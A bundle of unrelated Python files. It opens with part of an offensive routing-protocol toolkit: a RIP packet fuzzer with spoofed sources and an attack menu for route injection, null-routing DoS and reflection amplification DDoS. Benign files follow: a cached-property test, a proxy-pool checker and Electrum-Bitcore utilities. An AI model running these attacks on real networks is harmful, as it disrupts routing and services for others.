rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
test_async_cached_property.py
|
# -*- coding: utf-8 -*-
import asyncio
import time
import unittest
from threading import Lock, Thread
from freezegun import freeze_time
import property_cached as cached_property
def unittest_run_loop(f):
def wrapper(*args, **kwargs):
coro = asyncio.coroutine(f)
future = coro(*args, **kwargs)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
return wrapper
def CheckFactory(cached_property_decorator, threadsafe=False):
"""
Create dynamically a Check class whose add_cached method is decorated by
the cached_property_decorator.
"""
class Check(object):
def __init__(self):
self.control_total = 0
self.cached_total = 0
self.lock = Lock()
async def add_control(self):
self.control_total += 1
return self.control_total
@cached_property_decorator
async def add_cached(self):
if threadsafe:
time.sleep(1)
# Need to guard this since += isn't atomic.
with self.lock:
self.cached_total += 1
else:
self.cached_total += 1
return self.cached_total
def run_threads(self, num_threads):
threads = []
for _ in range(num_threads):
def call_add_cached():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self.add_cached)
thread = Thread(target=call_add_cached)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return Check
class TestCachedProperty(unittest.TestCase):
"""Tests for cached_property"""
cached_property_factory = cached_property.cached_property
async def assert_control(self, check, expected):
"""
Assert that both `add_control` and 'control_total` equal `expected`
"""
self.assertEqual(await check.add_control(), expected)
self.assertEqual(check.control_total, expected)
async def assert_cached(self, check, expected):
"""
Assert that both `add_cached` and 'cached_total` equal `expected`
"""
print("assert_cached", check.add_cached)
self.assertEqual(await check.add_cached, expected)
self.assertEqual(check.cached_total, expected)
@unittest_run_loop
async def test_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# The control shows that we can continue to add 1
await self.assert_control(check, 1)
await self.assert_control(check, 2)
# The cached version demonstrates how nothing is added after the first
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# The cache does not expire
with freeze_time("9999-01-01"):
await self.assert_cached(check, 1)
# Typically descriptors return themselves if accessed though the class
# rather than through an instance.
self.assertTrue(isinstance(Check.add_cached, self.cached_property_factory))
@unittest_run_loop
async def test_reset_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# Run standard cache assertion
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# Clear the cache
del check.add_cached
# Value is cached again after the next access
await self.assert_cached(check, 2)
await self.assert_cached(check, 2)
@unittest_run_loop
async def test_none_cached_property(self):
class Check(object):
def __init__(self):
self.cached_total = None
@self.cached_property_factory
async def add_cached(self):
return self.cached_total
await self.assert_cached(Check(), None)
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
async def test_single_proxy(self, proxy):
"""
text one proxy, if valid, put them to usable_proxies.
"""
try:
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.no_repeat_put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
aio test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter()
def is_over_threshold(self):
"""
judge if count is overflow.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod
def valid_proxy(cycle=VALID_CHECK_CYCLE):
"""
Get half of proxies which in redis
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
If the number of proxies less than lower_threshold, add proxy
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running')
valid_process = Process(target=Schedule.valid_proxy)
check_process = Process(target=Schedule.check_pool)
valid_process.start()
check_process.start()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTX':8, 'mBTX':5, 'uBTX':2}
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTX"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
localtime = time.localtime(time.time())
disptime = str(localtime.tm_hour)+":"+str(localtime.tm_min)+":"+str(localtime.tm_sec)
print_error("[%s]" % self.diagnostic_name(), disptime, *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-bitcore")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Bitcore")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Bitcore")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bitcore.cc Insight': ('https://insight.bitcore.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chainz Explorer': ('https://chainz.cryptoid.info/btx/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcore address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcore URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcore address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
